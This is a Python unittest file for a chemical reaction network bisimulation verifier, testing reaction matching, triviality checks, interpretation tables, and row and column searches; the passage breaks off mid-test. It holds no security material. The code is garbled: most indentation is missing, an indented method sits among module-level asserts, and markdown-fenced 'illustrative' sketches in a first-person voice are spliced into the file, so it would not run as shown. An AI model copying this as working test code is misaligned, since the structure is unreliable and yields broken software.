assert sorted(list(enumL(2, ['A', 'A', 'B'], weights = [1, 2]))) == sorted(
[[('A', 'A', 'B'), ()],
[('B',), ('A',)]])
assert sorted(list(enumL(3, list('AAAAB'), weights = [2, 1, 2]))) == sorted([
[(), ('A', 'A', 'A', 'A', 'B'), ()],
[('A',), ('A', 'A', 'B'), ()],
[(), ('A', 'A', 'B'), ('A',)],
[('A', 'A'), ('B',), ()],
[(), ('B',), ('A', 'A')],
[('A',), ('B',), ('A',)]])
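    def test_enum_bruteforce_sketch(self):
        # For the unweighted case, enumL's outputs can be reproduced by brute
        # force: route every element of the multiset to one of n ordered bins
        # (the helper is a hypothetical stand-in, not the library function).
        from itertools import product
        def distribute(n, elems):
            out = set()
            for assign in product(range(n), repeat=len(elems)):
                bins = [[] for _ in range(n)]
                for e, b in zip(elems, assign):
                    bins[b].append(e)
                out.add(tuple(tuple(sorted(b)) for b in bins))
            return out
        # Same counts as the unweighted cases above.
        assert distribute(2, ['A']) == {(('A',), ()), ((), ('A',))}
        assert len(distribute(2, ['A', 'A'])) == 3
        assert len(distribute(3, ['A', 'B'])) == 9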
def test_same_reaction(self):
frxn = "A + B -> C"
irxn = "A + B -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C + B"
irxn = "A + b -> B"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_new(self):
# trying to break the old code ...
frxn = "A -> C + D"
irxn = "A + y -> C + y"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C"
irxn = "A + y -> C + y"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> B + B"
irxn = "i5 + i5 -> i8"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "B + B -> A + B"
irxn = "i5 -> i8 + i8"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_products(self):
frxn = "A + B -> C + D"
irxn = "A + B -> c"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> c + d"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> "
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B -> C + B"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_same_reaction_reactants(self):
# NOTE: tests include potential null species ...
frxn = "A + B -> C"
irxn = "a -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C + D"
irxn = "a + b -> C + D"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A -> C + D"
irxn = "A + b -> C + D"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A + B + A -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
frxn = "A + B -> C"
irxn = "A -> C"
fcrn, fs = parse_crn(frxn)
icrn, _ = parse_crn(irxn)
assert not same_reaction(icrn[0], fcrn[0], fs)
def test_trivial_reaction(self):
fs = set('ABC')
irxn = "x -> y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
irxn = "x -> A"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
irxn = "A -> y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
irxn = "x + y -> A"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
irxn = "x + y -> A + B"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
irxn = "x + x -> A + B"
icrn, _ = parse_crn(irxn)
assert not trivial_reaction(icrn[0], fs)
irxn = "a + x + x -> A + B + y"
icrn, _ = parse_crn(irxn)
assert trivial_reaction(icrn[0], fs)
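# The notion of triviality exercised above can be paraphrased with a
# brute-force search: a reaction is trivial iff the non-formal species
# admit some interpretation (as multisets over the formal species) under
# which the interpreted reactants equal the interpreted products. This
# is my illustrative restatement, not the library's actual algorithm.

```python
from collections import Counter
from itertools import product

def trivial_sketch(reactants, products, fs):
    """Return True iff some interpretation of the non-formal species
    turns the reaction (reactants -> products) into a null reaction."""
    lf = Counter({s: n for s, n in reactants.items() if s in fs})
    rf = Counter({s: n for s, n in products.items() if s in fs})
    unknowns = sorted((set(reactants) | set(products)) - fs)
    fsl = sorted(fs)
    bound = sum(lf.values()) + sum(rf.values())
    # Candidate interpretations: all multisets over fs with counts <= bound.
    cands = [Counter({s: c for s, c in zip(fsl, cnts) if c})
             for cnts in product(range(bound + 1), repeat=len(fsl))]
    for assign in product(cands, repeat=len(unknowns)):
        inter = dict(zip(unknowns, assign))
        lhs, rhs = Counter(lf), Counter(rf)
        for x in unknowns:
            for _ in range(reactants.get(x, 0)):
                lhs.update(inter[x])
            for _ in range(products.get(x, 0)):
                rhs.update(inter[x])
        if lhs == rhs:
            return True
    return False
```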
def test_update_table(self):
fcrn = "A + B -> C"
icrn = "x + y -> c + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = "A + B -> C"
icrn = "A + B -> C + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, False]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> y; y <=> z; z -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, True],
[True, True],
[True, True],
[True, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> A; A <=> A; A -> A"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[True, False],
[False, True],
[False, True],
[False, True]]
assert makeT(fcrn, icrn, fs) == table
fcrn = " -> A"
icrn = " -> ; <=> ; -> A"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[False, True],
[False, True],
[False, True],
[True, False]]
assert makeT(fcrn, icrn, fs) == table
def test_update_table_large(self):
fcrn = """ A + b -> c
b -> c
c -> b
b -> 2b """
icrn = """ A -> i7
i7 -> A
i7 + b -> i19
b -> i96
b -> i148
i7 + b -> i19
b -> i96
b -> i148
i7 + b -> i19
b -> i96
b -> i148
c -> i340
c -> i340
i19 -> c
i96 -> c
i148 -> b + b
i340 -> b """
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
table = [[False, False, False, False, True],
[False, False, False, False, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[True, True, False, True, True],
[False, True, False, True, True],
[False, True, False, True, True],
[False, False, True, False, True],
[False, False, True, False, True],
[True, True, False, False, True],
[True, True, False, False, True],
[False, False, False, True, True],
[False, False, True, False, True]]
assert makeT(fcrn, icrn, fs) == table
def test_check_table(self):
table = [[True, True]]
assert checkT(table) is True
table = [[False, False]]
assert checkT(table) is False
table = [[True, True],
[False, False]]
assert checkT(table) is False
table = [[False, True],
[True, False]]
assert checkT(table) is True
table = [[False, False],
[True, True]]
assert checkT(table) is False
table = [[True, False],
[True, False]]
assert checkT(table) is True
table = [[True, True, False],
[False, True, False]]
assert checkT(table) is True
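# The expectations above are consistent with a simple reading of checkT:
# a table is feasible when every row (implementation reaction) has some
# True entry, and every column except the last (the extra column for
# trivial reactions) is covered by at least one row. A standalone sketch
# of that reading (my paraphrase, not the library's code):

```python
def check_table_sketch(table):
    # Each implementation reaction must map to some formal
    # reaction or be trivial: every row needs a True.
    if not all(any(row) for row in table):
        return False
    # Each formal reaction must be implemented by some row;
    # the final (trivial) column is exempt from this.
    ncols = len(table[0])
    return all(any(row[j] for row in table) for j in range(ncols - 1))
```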
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class ConditionTests(unittest.TestCase):
def test_atomic_01(self):
fs = {'A', 'B', 'C'}
inter = {'a' : ['B'],
'B' : ['A'],
'c' : ['C']}
assert passes_atomic_condition(inter, fs)
def test_delimiting_01(self):
fcrn = "A + B -> C"
icrn = "a + b -> c"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['B'],
'b' : ['A'],
'c' : ['C']}
assert passes_delimiting_condition(fcrn, icrn, fs, inter)
def test_permissive_01(self):
fcrn = "A + B -> C"
icrn = "a + b -> c"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['B'],
'b' : ['A'],
'c' : ['C']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_02(self):
fcrn = " -> A"
icrn = "x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
def test_permissive_03(self):
fcrn = " -> A"
icrn = " -> x; x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : ['A']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
inter = {'a' : ['A'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_03b(self):
fcrn = " -> A"
icrn = " -> x; -> y; x + y -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'x' : [],
'y' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
inter = {'a' : ['A'],
'x' : ['A'],
'y' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_04(self):
fcrn = "B -> A"
icrn = "b -> b + x; b + 3x -> a"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'a' : ['A'],
'b' : ['B'],
'x' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_05(self):
fcrn = "A -> B"
icrn = "x -> y; y -> x + z; x + 3z -> b"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter = {'x' : ['A'],
'b' : ['B'],
'y' : ['A'],
'z' : []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_06(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter={'a': ['B'], 'b': ['A'], 'c': [], 'd': ['A', 'B'], 'e': ['C'], 'f': ['D']}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
def test_permissive_07(self):
# JDW 2019
fcrn = "A + B -> C"
icrn = """ a1 <=> a2
a2 + b1 <=> ab
ab -> a1 + b1 + 2z
b1 + 3z -> b2
a1 + b2 + 2z -> c1
a2 + b2 -> c2
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
inter={'a1': ['A'],
'a2': ['A'],
'b1': ['B'],
'b2': ['B'],
'ab': ['A', 'B'],
'c1': ['C'],
'c2': ['C'],
'z': []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
assert passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert passes
def test_permissive_08(self):
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter = {'i{A}': ['A'],
'i{B}': ['B'],
'i{C}': ['C'],
'i{X}': ['X'],
'i{Y}': ['Y'],
'i14': [],
'i15': [],
'i73': ['B'],
'i119': ['X', 'B', 'A'],
'i120': [],
'i194': [],
'i394': ['X', 'X', 'Y'],
'i575': ['X'],
'i599': ['C'],
'i631': [],
'i778': ['Y'],
'i842': ['Y', 'X', 'A'],
'i886': [],
'i969': [],
'i1457': [],
'i2232': ['A'],
'i2300': ['A', 'C'],
'i2340': [],
'i2392': [],
'i3032': []}
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'graphsearch')
assert not passes
#passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'loopsearch')
#assert not passes
passes, info = passes_permissive_condition(fcrn, icrn, fs, inter, 'bruteforce')
assert not passes
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestColumnSearch(unittest.TestCase):
def test_search_column_01(self):
fcrn = "A -> B + C"
icrn = """x1 -> x2
x2 -> x3 + x4
x3 <=> x5
x4 -> x7 + x8
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i1 = {'x2': ['A'], 'x3': ['B', 'C'], 'x4': []}
i2 = {'x2': ['A'], 'x3': ['B'], 'x4': ['C']}
i3 = {'x2': ['A'], 'x3': ['C'], 'x4': ['B']}
i4 = {'x2': ['A'], 'x3': [], 'x4': ['B', 'C']}
i5 = {'x4': ['A'], 'x7': ['B', 'C'], 'x8': []}
i6 = {'x4': ['A'], 'x7': ['B'], 'x8': ['C']}
i7 = {'x4': ['A'], 'x7': ['C'], 'x8': ['B']}
i8 = {'x4': ['A'], 'x7': [], 'x8': ['B', 'C']}
i9 = {'x1': ['A'], 'x2': ['B', 'C']}
cols = list(search_column(fcrn, icrn, fs))
if len(cols) != 9:
print('FAILURE:')
for e, b in enumerate(cols, 1):
print(e, b)
assert len(cols) == 9
assert i1 in cols
assert i2 in cols
assert i3 in cols
assert i4 in cols
assert i5 in cols
assert i6 in cols
assert i7 in cols
assert i8 in cols
assert i9 in cols
def test_search_column_02(self):
fcrn = """A + B -> C + D
A + C -> B + D"""
icrn = """x1 -> x2
x3 + x4 <=> x5
x2 -> x6 + x8
x5 -> x7
x3 <=> x6
x9 <=> x10
x10 + x4 <=> x1
x7 -> x9 + x8"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
cols = list(search_column(fcrn, icrn, fs))
# SB: These interpretations were not verified by hand; re-check them if this test ever fails!
i01 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i02 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': []}
i03 = {'x1': ['A', 'B'], 'x2': ['C', 'D'], 'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D']}
i04 = {'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D'], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i05 = {'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D'], 'x7': ['A', 'C'], 'x9': ['B']}
i06 = {'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': [], 'x5': ['A', 'C'], 'x7': ['B', 'D']}
i07 = {'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': [], 'x7': ['A', 'C'], 'x9': ['B', 'D']}
i08 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i09 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': []}
i10 = {'x5': ['A', 'B'], 'x7': ['C', 'D'], 'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D']}
i11 = {'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D'], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i12 = {'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D'], 'x2': ['A', 'C'], 'x6': ['B']}
i13 = {'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': [], 'x1': ['A', 'C'], 'x2': ['B', 'D']}
i14 = {'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': [], 'x2': ['A', 'C'], 'x6': ['B', 'D']}
i15 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i16 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x7': ['A', 'B'], 'x9': ['C'], 'x8': ['D']}
i17 = {'x1': ['A', 'C'], 'x2': ['B', 'D'], 'x7': ['A', 'B'], 'x9': ['C', 'D'], 'x8': []}
i18 = {'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': [], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i19 = {'x2': ['A', 'C'], 'x6': ['B', 'D'], 'x8': [], 'x7': ['A', 'B'], 'x9': ['C', 'D']}
i20 = {'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D'], 'x5': ['A', 'B'], 'x7': ['C', 'D']}
i21 = {'x2': ['A', 'C'], 'x6': ['B'], 'x8': ['D'], 'x7': ['A', 'B'], 'x9': ['C']}
i22 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i23 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x2': ['A', 'B'], 'x6': ['C'], 'x8': ['D']}
i24 = {'x5': ['A', 'C'], 'x7': ['B', 'D'], 'x2': ['A', 'B'], 'x6': ['C', 'D'], 'x8': []}
i25 = {'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': [], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i26 = {'x7': ['A', 'C'], 'x9': ['B', 'D'], 'x8': [], 'x2': ['A', 'B'], 'x6': ['C', 'D']}
i27 = {'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D'], 'x1': ['A', 'B'], 'x2': ['C', 'D']}
i28 = {'x7': ['A', 'C'], 'x9': ['B'], 'x8': ['D'], 'x2': ['A', 'B'], 'x6': ['C']}
if len(cols) != 28:
print('FAILURE:')
for e, b in enumerate(cols, 1):
print(e, b)
assert len(cols) == 28
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestRowSearch(unittest.TestCase):
def test_search_row_01(self):
fcrn = "A -> B + C"
icrn = """x1 -> x2
x2 -> x3 + x4
x3 <=> x5
x4 -> x7 + x8
"""
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i1 = {'x2': ['A'], 'x3': ['B', 'C'], 'x4': []}
rows = list(search_row(fcrn, icrn, fs, i1))
assert len(rows) == 0
i2 = {'x2': ['A'], 'x3': ['B'], 'x4': ['C']}
i2r01 = {'x1': ['A'], 'x2': ['A'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': ['C'], 'x8': []}
i2r02 = {'x1': ['A'], 'x2': ['A'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': [], 'x8': ['C']}
rows = list(search_row(fcrn, icrn, fs, i2))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i2r01 in rows
assert i2r02 in rows
i3 = {'x2': ['A'], 'x3': ['C'], 'x4': ['B']}
i3r01 = {'x1': ['A'], 'x2': ['A'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': [], 'x8': ['B']}
i3r02 = {'x1': ['A'], 'x2': ['A'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': ['B'], 'x8': []}
rows = list(search_row(fcrn, icrn, fs, i3))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i3r01 in rows
assert i3r02 in rows
i4 = {'x2': ['A'], 'x3': [], 'x4': ['B', 'C']}
i4r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
i4r02 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
rows = list(search_row(fcrn, icrn, fs, i4))
if len(rows) != 2:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 2
assert i4r01 in rows
assert i4r02 in rows
i5 = {'x4': ['A'], 'x7': ['B', 'C'], 'x8': []}
rows = list(search_row(fcrn, icrn, fs, i5))
assert len(rows) == 0
i6 = {'x4': ['A'], 'x7': ['B'], 'x8': ['C']}
i6r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['A'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
i6r02 = {'x1': ['A', 'B'], 'x2': ['A', 'B'], 'x3': ['B'], 'x4': ['A'], 'x5': ['B'], 'x7': ['B'], 'x8': ['C']}
i6r03 = {'x1': ['A', 'C'], 'x2': ['A', 'C'], 'x3': ['C'], 'x4': ['A'], 'x5': ['C'], 'x7': ['B'], 'x8': ['C']}
rows = list(search_row(fcrn, icrn, fs, i6))
if len(rows) != 3:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 3
assert i6r01 in rows
assert i6r02 in rows
assert i6r03 in rows
i7 = {'x4': ['A'], 'x7': ['C'], 'x8': ['B']}
i7r01 = {'x1': ['A'], 'x2': ['A'], 'x3': [], 'x4': ['A'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
i7r02 = {'x1': ['A', 'B'], 'x2': ['A', 'B'], 'x3': ['B'], 'x4': ['A'], 'x5': ['B'], 'x7': ['C'], 'x8': ['B']}
i7r03 = {'x1': ['A', 'C'], 'x2': ['A', 'C'], 'x3': ['C'], 'x4': ['A'], 'x5': ['C'], 'x7': ['C'], 'x8': ['B']}
rows = list(search_row(fcrn, icrn, fs, i7))
if len(rows) != 3:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 3
assert i7r01 in rows
assert i7r02 in rows
assert i7r03 in rows
i8 = {'x4': ['A'], 'x7': [], 'x8': ['B', 'C']}
rows = list(search_row(fcrn, icrn, fs, i8))
assert len(rows) == 0
i9 = {'x1': ['A'], 'x2': ['B', 'C']}
i9r01 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': [], 'x8': ['B']}
i9r02 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['C'], 'x4': ['B'], 'x5': ['C'], 'x7': ['B'], 'x8': []}
i9r03 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': ['C'], 'x8': []}
i9r04 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': ['B'], 'x4': ['C'], 'x5': ['B'], 'x7': [], 'x8': ['C']}
i9r05 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['C'], 'x8': ['B']}
i9r06 = {'x1': ['A'], 'x2': ['B', 'C'], 'x3': [], 'x4': ['B', 'C'], 'x5': [], 'x7': ['B'], 'x8': ['C']}
rows = list(search_row(fcrn, icrn, fs, i9))
if len(rows) != 6:
print('FAILURE:')
for e, b in enumerate(rows, 1):
print(e, {k: v for k, v in sorted(b.items())})
assert len(rows) == 6
assert i9r01 in rows
assert i9r02 in rows
assert i9r03 in rows
assert i9r04 in rows
assert i9r05 in rows
assert i9r06 in rows
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class TestSearchSpace(unittest.TestCase):
def test_1f_1i(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D']}
i02 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D']}
i03 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C']}
i04 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C']}
bisims = list(crn_bisimulations(fcrn, icrn))
assert len(bisims) == 4
assert i01 in bisims
assert i02 in bisims
assert i03 in bisims
assert i04 in bisims
def test_1f_2i(self):
fcrn = "A + B -> C + D"
icrn = "a + b -> c + d; d + c -> e + f"
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
i01 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['C'], 'f': ['D']}
i02 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['D'], 'f': ['C']}
i03 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': [], 'f': ['C', 'D']}
i04 = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'd': ['D'], 'e': ['C', 'D'], 'f': []}
i05 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['C'], 'f': ['D']}
i06 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['D'], 'f': ['C']}
i07 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': ['C', 'D'], 'f': []}
i08 = {'a': ['B'], 'b': ['A'], 'c': ['D'], 'd': ['C'], 'e': [], 'f': ['C', 'D']}
i09 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['C'], 'f': ['D']}
i10 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['D'], 'f': ['C']}
i11 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': [], 'f': ['C', 'D']}
i12 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'e': ['C', 'D'], 'f': []}
i13 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['C'], 'f': ['D']}
i14 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['D'], 'f': ['C']}
i15 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': ['C', 'D'], 'f': []}
i16 = {'a': ['A'], 'b': ['B'], 'c': ['D'], 'd': ['C'], 'e': [], 'f': ['C', 'D']}
i17 = {'a': ['B'], 'b': ['A'], 'c': ['C', 'D'], 'd': [], 'e': ['C'], 'f': ['D']}
i18 = {'a': ['B'], 'b': ['A'], 'c': ['C', 'D'], 'd': [], 'e': ['D'], 'f': ['C']}
i19 = {'a': ['B'], 'b': ['A'], 'c': [], 'd': ['C', 'D'], 'e': ['C'], 'f': ['D']}
i20 = {'a': ['B'], 'b': ['A'], 'c': [], 'd': ['C', 'D'], 'e': ['D'], 'f': ['C']}
i21 = {'a': ['A'], 'b': ['B'], 'c': ['C', 'D'], 'd': [], 'e': ['C'], 'f': ['D']}
i22 = {'a': ['A'], 'b': ['B'], 'c': ['C', 'D'], 'd': [], 'e': ['D'], 'f': ['C']}
i23 = {'a': ['A'], 'b': ['B'], 'c': [], 'd': ['C', 'D'], 'e': ['C'], 'f': ['D']}
